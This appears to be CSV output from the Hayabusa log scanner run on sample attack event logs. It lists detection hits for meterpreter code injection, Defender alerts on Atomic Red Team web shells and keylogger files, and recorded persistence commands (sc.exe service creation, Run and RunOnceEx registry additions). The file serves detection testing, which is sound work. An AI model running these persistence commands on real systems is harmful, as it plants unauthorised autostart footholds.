2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\notepad.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,Rundll32 Without Parameters,,rules/sigma/process_creation/win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T : Severity: Severe : Type: Backdoor : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:51:50.275 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:53:31.900 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:53:31.902 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:53:31.952 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA21C70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,New Service Creation,,rules/sigma/process_creation/win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe start AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe stop AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe delete AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
